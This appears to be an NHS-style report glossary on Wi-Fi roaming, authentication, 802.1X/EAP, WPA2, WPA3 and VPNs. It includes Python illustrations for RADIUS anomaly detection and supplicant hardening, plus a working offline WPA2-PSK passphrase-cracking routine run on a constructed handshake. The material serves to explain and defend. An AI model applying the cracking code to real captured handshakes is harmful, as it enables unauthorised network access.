
Wi-Fi roaming

In its technical (IEEE 802.11) sense, Wi-Fi roaming is a wireless client moving from one Access Point (AP) to another AP serving the same wireless network (the same Extended Service Set, which may or may not be a meshed network), re-authenticating and re-associating with the new AP without losing its connection. However, for the purpose of this report, the definition of Wi-Fi roaming is:

“Providing generic internet access to end user devices (or IoT devices) which are not in their usual corporate Wi-Fi network location (and not necessarily with accompanying private network access or routing to their corporate networks, which can be delivered via overlay Virtual Private Network services), but are in a Wi-Fi network location owned/managed by another publicly funded NHS/ICB Partner.”


Authentication, Authorisation and Accounting (AAA)

Authentication is the process of verifying the identity of a user or device. In the context of Wi-Fi and network access, authentication establishes who or what is connecting, so that the separate decision of whether that user or device may access the network (authorisation) can be made. Authentication can be achieved using various methods, such as passwords, biometrics, smart cards, digital certificates or other credentials.

Authorisation is required following authentication. Authorisation is the process of determining what actions or resources a user or device is permitted to access. In the context of Wi-Fi and network access, authorisation involves granting specific privileges or permissions to authenticated users or devices based on their identity and role in the organisation.

For example, when a user connects to a Wi-Fi network, they may be required to enter a password to authenticate themselves. Once authenticated, the user’s device is granted access to the network and may be authorised to access specific resources, such as printers or servers, based on their role within the organisation. Similarly, when a device connects to a network, it may need to be authenticated and authorised before being granted access to the network.

Authentication and authorisation are critical components of network security, as they help ensure that only authorised users and devices can access the network, and that they only have access to the resources they need to do their job. Without adequate authentication and authorisation, networks and the data they contain are vulnerable to attack.

Accounting is the process of collecting information about network usage and storing it in a database for later analysis. It involves recording information about user sessions, such as the time of login and logout, the services accessed, the amount of data transferred, and other details related to network usage. Accounting information can be used to detect security breaches or suspicious activity on the network and it can be used to ensure that the network is being used in compliance with organisational policies and regulations.

Organisations that collect data about network usage should ensure that they do so in compliance with applicable data protection legislation, including the General Data Protection Regulation (GDPR). Accounting records identify individuals (usernames, device MAC addresses, times and locations), so retention periods and access to them should be defined in advance.
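As an illustration added to this report (it is not part of the original text, nor any NHS or vendor tooling), the following Python script runs two simple detections over RADIUS accounting records of the kind described above. The records are a constructed CSV export: the attribute names (Acct-Status-Type, Calling-Station-Id, NAS-Identifier, Acct-Session-Id, Acct-Input-Octets, Acct-Output-Octets, Event-Timestamp) are standard RADIUS attributes, but every user, MAC address, NAS name, session ID and timestamp is invented. A device roaming between partner sites appears as consecutive, non-overlapping sessions; a single client MAC with overlapping sessions at two different sites is the anomaly the first detection flags.

```python
"""Simple detections over RADIUS accounting records.

Added illustration, not from the original report. ACCOUNTING_EXPORT is a
constructed CSV export: standard RADIUS attribute names, invented values,
timestamps rendered as ISO 8601.
"""
import csv
import io
from collections import defaultdict
from datetime import datetime

ACCOUNTING_EXPORT = """\
Event-Timestamp,Acct-Status-Type,User-Name,Calling-Station-Id,NAS-Identifier,Acct-Session-Id,Acct-Input-Octets,Acct-Output-Octets
2025-03-11T09:00:00Z,Start,jdoe@trust-a.nhs.uk,02-AA-BB-CC-DD-02,ap-trust-a-ward3,s1,,
2025-03-11T09:05:00Z,Start,asmith@trust-a.nhs.uk,02-AA-BB-CC-DD-03,ap-trust-a-ward3,s2,,
2025-03-11T09:20:00Z,Start,asmith@trust-a.nhs.uk,02-AA-BB-CC-DD-03,ap-trust-b-outpatients,s3,,
2025-03-11T09:30:00Z,Stop,jdoe@trust-a.nhs.uk,02-AA-BB-CC-DD-02,ap-trust-a-ward3,s1,1200000,35000000
2025-03-11T09:45:00Z,Stop,asmith@trust-a.nhs.uk,02-AA-BB-CC-DD-03,ap-trust-b-outpatients,s3,500000,9000000
2025-03-11T09:50:00Z,Stop,asmith@trust-a.nhs.uk,02-AA-BB-CC-DD-03,ap-trust-a-ward3,s2,6000000000,2500000000
2025-03-11T10:00:00Z,Start,jdoe@trust-a.nhs.uk,02-AA-BB-CC-DD-02,ap-trust-b-outpatients,s4,,
2025-03-11T10:40:00Z,Stop,jdoe@trust-a.nhs.uk,02-AA-BB-CC-DD-02,ap-trust-b-outpatients,s4,800000,20000000
"""


def parse_sessions(export):
    """Pair Start and Stop records by Acct-Session-Id into completed sessions."""
    sessions = {}
    for row in csv.DictReader(io.StringIO(export)):
        ts = datetime.fromisoformat(row["Event-Timestamp"].replace("Z", "+00:00"))
        sid = row["Acct-Session-Id"]
        if row["Acct-Status-Type"] == "Start":
            sessions[sid] = {"session": sid, "user": row["User-Name"],
                             "mac": row["Calling-Station-Id"], "nas": row["NAS-Identifier"],
                             "start": ts, "stop": None, "octets": 0}
        elif row["Acct-Status-Type"] == "Stop" and sid in sessions:
            sessions[sid]["stop"] = ts
            sessions[sid]["octets"] = int(row["Acct-Input-Octets"]) + int(row["Acct-Output-Octets"])
    # Sessions still open (no Stop yet) are left out of the detections below.
    return [s for s in sessions.values() if s["stop"] is not None]


def concurrent_site_sessions(sessions):
    """Flag a client MAC active at two different NAS sites at the same time.

    A roaming device moves from one site to the next, so its sessions do not
    overlap. Overlapping sessions at different sites suggest a cloned MAC
    address or a shared credential in use in two places at once.
    """
    by_mac = defaultdict(list)
    for s in sessions:
        by_mac[s["mac"]].append(s)
    alerts = []
    for mac, ss in by_mac.items():
        ss.sort(key=lambda s: s["start"])
        for i, a in enumerate(ss):
            for b in ss[i + 1:]:
                if b["start"] < a["stop"] and a["nas"] != b["nas"]:
                    alerts.append((mac, a["session"], b["session"]))
    return alerts


def high_volume_sessions(sessions, limit_bytes):
    """Flag sessions that moved more data than a per-session limit."""
    return [(s["session"], s["user"], s["octets"]) for s in sessions if s["octets"] > limit_bytes]


def run_detections(export=ACCOUNTING_EXPORT, limit_bytes=5 * 10**9):
    """Run both detections and return their findings."""
    sessions = parse_sessions(export)
    return {"concurrent": concurrent_site_sessions(sessions),
            "high_volume": high_volume_sessions(sessions, limit_bytes)}


if __name__ == "__main__":
    for kind, findings in run_detections().items():
        print(kind, findings)
```

In the constructed data, jdoe's device roams cleanly from Trust A to Trust B (sessions s1 then s4), while asmith's device is recorded at both sites between 09:20 and 09:45 (s2 and s3) and s2 also moves 8.5 GB. The volume threshold is a placeholder; a real deployment would set it from observed baselines per site.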


IEEE Standard 802.1X

IEEE Standard 802.1X is a standard for port-based network access control: a switch port or wireless association stays blocked until the connecting device (the supplicant) has authenticated, through the switch or AP (the authenticator), to an authentication server, which is almost always a RADIUS server. 802.1X does not define the authentication itself; it carries Extensible Authentication Protocol (EAP) exchanges, so the credentials used can be passwords, smart cards, digital certificates or biometrics depending on the EAP method chosen. Nor does 802.1X encrypt traffic, but a successful EAP authentication yields keying material that WPA2 and WPA3 use to derive per-session encryption keys. 802.1X deployments can be vulnerable to man-in-the-middle and spoofing attacks, most commonly a rogue AP advertising the same SSID and backed by the attacker's own RADIUS server in order to capture client credentials. The principal mitigation is on the client: use a TLS-based EAP method (EAP-TLS, PEAP or EAP-TTLS) and configure the supplicant to validate the server certificate against the expected Certificate Authority and server name, so it will not complete the exchange with an impostor. Firewalls and intrusion detection systems are useful additional controls but do not address this weakness on their own.


Extensible Authentication Protocol (EAP)

The Extensible Authentication Protocol (EAP) is an authentication framework (RFC 3748) that defines how a client and an authentication server exchange authentication messages; the EAP method in use (EAP-TLS, PEAP, EAP-TTLS and others) determines which credential is checked. Access to Wi-Fi networks is often protected by a single shared password. EAP-based access (WPA2-Enterprise or WPA3-Enterprise) instead authenticates each user or device individually: by digital certificate, by smart card, by username and password carried inside a TLS tunnel, or by a biometric such as fingerprint or face recognition unlocking one of those credentials on the device. This gives each user a distinct identity and per-session keys, and the TLS-based methods protect against man-in-the-middle attacks, where an attacker intercepts and alters communications between two parties. That protection holds only if the client validates the server's certificate; a client configured to accept any certificate gains none of it.
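The two sections above (802.1X and EAP) both come down to the same client-side check. As an illustration added to this report (not part of the original text, and not any NHS or vendor configuration), the following Python script audits an 802.1X supplicant profile for the settings whose absence makes the man-in-the-middle attack possible. The two profiles are constructed wpa_supplicant-style network blocks: the directive names (key_mgmt, eap, ca_cert, domain_suffix_match, phase2, anonymous_identity) are real wpa_supplicant directives, while the SSID, identities, password, certificate path and hostname are invented.

```python
"""Audit an 802.1X/EAP supplicant profile for server-validation settings.

Added illustration, not from the original report. The profiles are
constructed wpa_supplicant-style network blocks with invented values.
"""
import re

# Constructed example: authenticates, but never checks who the RADIUS server
# is, so any AP with the same SSID can harvest the MSCHAPv2 exchange.
WEAK_PROFILE = """
network={
    ssid="NHS-Roaming"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe@example.nhs.uk"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed example: the same profile hardened so the client only continues
# the TLS tunnel with a server whose certificate chains to the expected CA
# and carries the expected name, and never sends the real username in clear.
HARDENED_PROFILE = """
network={
    ssid="NHS-Roaming"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe@example.nhs.uk"
    anonymous_identity="anonymous@example.nhs.uk"
    password="hunter2"
    ca_cert="/etc/ssl/certs/radius-ca.pem"
    domain_suffix_match="radius.example.nhs.uk"
    phase2="auth=MSCHAPV2"
}
"""

_KV = re.compile(r'^\s*(\w+)\s*=\s*"?([^"]*)"?\s*$')
_NAME_PINNING = {"domain_suffix_match", "domain_match", "altsubject_match"}
_TLS_METHODS = {"PEAP", "TTLS", "TLS"}


def parse_network_block(text):
    """Return the key=value pairs inside the first network={...} block."""
    body = text.split("network={", 1)[1].split("}", 1)[0]
    settings = {}
    for line in body.splitlines():
        m = _KV.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def audit_profile(text):
    """Return a list of findings; an empty list means the profile is acceptable."""
    s = parse_network_block(text)
    findings = []
    if not any(k.startswith("WPA-EAP") for k in s.get("key_mgmt", "").split()):
        return ["key_mgmt is not WPA-EAP: this is not an 802.1X profile"]
    eap = s.get("eap", "").upper()
    if eap not in _TLS_METHODS:
        return [f"eap={eap or 'unset'}: use a TLS-tunnelled method (PEAP, TTLS or TLS)"]
    # A TLS-based method is only safe if the server is authenticated.
    if "ca_cert" not in s:
        findings.append("no ca_cert: any server certificate will be accepted")
    if not _NAME_PINNING & set(s):
        findings.append("no domain_suffix_match/domain_match/altsubject_match: "
                        "any certificate issued by the trusted CA will be accepted")
    if eap != "TLS" and "phase2" not in s:
        findings.append("no phase2: the inner method is negotiated and can be downgraded")
    if eap != "TLS" and "anonymous_identity" not in s:
        findings.append("no anonymous_identity: the real username is sent in clear "
                        "in the outer EAP-Identity")
    return findings


if __name__ == "__main__":
    print("weak:", audit_profile(WEAK_PROFILE))
    print("hardened:", audit_profile(HARDENED_PROFILE))
```

The same four checks apply to profiles pushed by MDM or Group Policy on managed devices: a trusted CA, a pinned server name, a fixed inner method and an anonymous outer identity. Without the first two, a rogue AP with any certificate completes the outer TLS handshake and receives the inner credential exchange.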


Wi-Fi Protected Access 2 (WPA2)

Wi-Fi Protected Access 2 (WPA2) is currently the most widely deployed Wi-Fi security protocol. It uses the Advanced Encryption Standard (AES, in CCMP mode) to encrypt data in transit and authenticates either with a Pre-Shared Key (WPA2-Personal) or with 802.1X and EAP (WPA2-Enterprise). WPA2-Personal is vulnerable to offline dictionary (brute-force) attacks: an attacker who captures the four-way handshake between a client and the AP can test candidate passphrases against it without any further contact with the network, so a weak or widely shared PSK can be recovered. Both modes were affected by the Key Reinstallation Attacks (KRACK) published in 2017, which exploit flaws in the four-way handshake to force nonce reuse and thereby decrypt or inject traffic; vendors patched this, so the remaining risk is unpatched clients and APs.
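The offline attack on WPA2-Personal described above is worth seeing end to end. The following Python script is an illustration added to this report (not from the original text): it derives the keys exactly as a client and AP do, generates a handshake message 2 for a constructed SSID and passphrase, and then recovers the passphrase from that captured frame alone using a small wordlist. The key derivation follows IEEE 802.11i (PBKDF2-HMAC-SHA1 for the PSK, the 802.11 PRF for the PTK, HMAC-SHA1 truncated to 128 bits for the EAPOL-Key MIC under CCMP); the SSID, passphrase, MAC addresses, nonces and wordlist are all invented, and the RSN information element normally carried in message 2 is omitted.

```python
"""Why a captured WPA2-PSK four-way handshake allows an offline dictionary attack.

Added illustration, not from the original report. SSID, passphrase, MAC
addresses, nonces and wordlist are constructed; key derivation follows
IEEE 802.11i.
"""
import hashlib
import hmac
import os
import struct

MIC_OFFSET = 81  # position of the Key MIC field in an EAPOL-Key frame (802.11 layout)


def psk_from_passphrase(passphrase, ssid):
    """PSK (= PMK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK for CCMP (48 bytes): KCK(16) || KEK(16) || TK(16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, frame):
    """EAPOL-Key MIC, descriptor version 2: HMAC-SHA1 over the frame with the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce):
    """An EAPOL-Key frame shaped like handshake message 2 (SNonce, MIC bit set, MIC zeroed)."""
    key_info = 0x010A  # descriptor version 2, pairwise key, MIC present
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 16, 1) + snonce  # type, info, len, replay
            + bytes(16) + bytes(8) + bytes(8)   # Key IV, Key RSC, Key ID
            + bytes(16)                          # Key MIC, filled in by the sender
            + struct.pack(">H", 0))              # Key Data Length (RSN IE omitted here)
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body


def capture_handshake(ssid, passphrase, aa, spa):
    """What a passive sniffer sees: both MACs, ANonce (message 1) and message 2 with its MIC."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = derive_ptk(psk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_message2(snonce)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "msg2": msg2}


def crack(capture, wordlist):
    """Offline attack: the MIC in message 2 verifies every candidate passphrase."""
    msg2 = capture["msg2"]
    snonce = msg2[17:49]  # Key Nonce field of message 2
    observed = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = psk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), observed):
            return candidate
    return None


# Constructed scenario: a guest-style SSID whose passphrase appears in a wordlist.
AA = bytes.fromhex("02aabbccdd01")   # AP (authenticator) MAC, invented
SPA = bytes.fromhex("02aabbccdd02")  # client (supplicant) MAC, invented
WORDLIST = ["password", "welcome1", "nhswifi2024", "Summer2024!", "letmein"]


def demo():
    """Capture one handshake for the weak passphrase and recover it offline."""
    return crack(capture_handshake("NHS-Guest", "nhswifi2024", AA, SPA), WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Nothing in the attack touches the network after the capture, which is why the only defence for a PSK network is a long random passphrase, and why WPA3-Personal's SAE matters: there, a captured exchange gives no such verifier, and each guess costs a live exchange with the AP.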


Wi-Fi Protected Access 3 (WPA3)

WPA3 was introduced by the Wi-Fi Alliance in 2018 and is the most secure Wi-Fi security protocol available today. WPA3-Personal replaces the WPA2 pre-shared key handshake with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange rather than an encryption algorithm: the passphrase is never transmitted, a captured exchange cannot be used for an offline dictionary attack because each guess requires a live exchange with the network, and each session gains forward secrecy. Data encryption remains AES (CCMP, with GCMP-256 in the WPA3-Enterprise 192-bit mode). WPA3 also requires Protected Management Frames, which hinder spoofed deauthentication. Because SAE produces a fresh pairwise key for every session, other users who know the same passphrase cannot decrypt a device's traffic, which they can under WPA2-PSK once they capture its handshake; the companion Wi-Fi Enhanced Open (OWE) brings similar per-device encryption to open networks that have no passphrase at all. Clients and APs that support only WPA2 typically join a WPA3 network in a transition mode that retains WPA2's weaknesses for those devices.


Virtual Private Networks (VPN)

Virtual Private Networks create a secure, encrypted connection (a tunnel) between a user's device and a remote server, allowing the user to access the internet as if they were directly connected to the server's network. VPNs can be used to provide remote access to a network, allowing employees to securely connect to their employer's private network from anywhere in the world; in the roaming scenario of this report, a VPN is how a device on a partner organisation's Wi-Fi reaches its own corporate network. VPNs hide the user's IP address from the sites they visit, which provides privacy and limits the collection of data about online behaviour, although the VPN operator itself can still see that traffic. VPNs encrypt data in transit using one of several protocols such as PPTP (Point-to-Point Tunnelling Protocol), L2TP/IPsec (Layer 2 Tunnelling Protocol with Internet Protocol Security), OpenVPN, SSTP (Secure Socket Tunnelling Protocol), IKEv2/IPsec (Internet Key Exchange version 2) and, more recently, WireGuard. Each of the protocols has strengths and weaknesses regarding security, speed and ease of use; PPTP in particular is obsolete, as its MS-CHAPv2 authentication and MPPE encryption are both broken, and it should not be used for any new deployment.

Footnotes

EU General Data Protection Regulation (GDPR) (2016/679), Arts. 5-6, 13-15, 24-28, 30-32, 35-36, 44-49.
https://csrc.nist.gov/glossary/term/authentication_authorization_and_accounting
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/15-sy/sec-usr-aaa-15-sy-book/sec-cfg-accountg.html#GUID-5369025B-B8A8-4CDC-A467-84645A721179


Last edited: 12 March 2025 11:10 am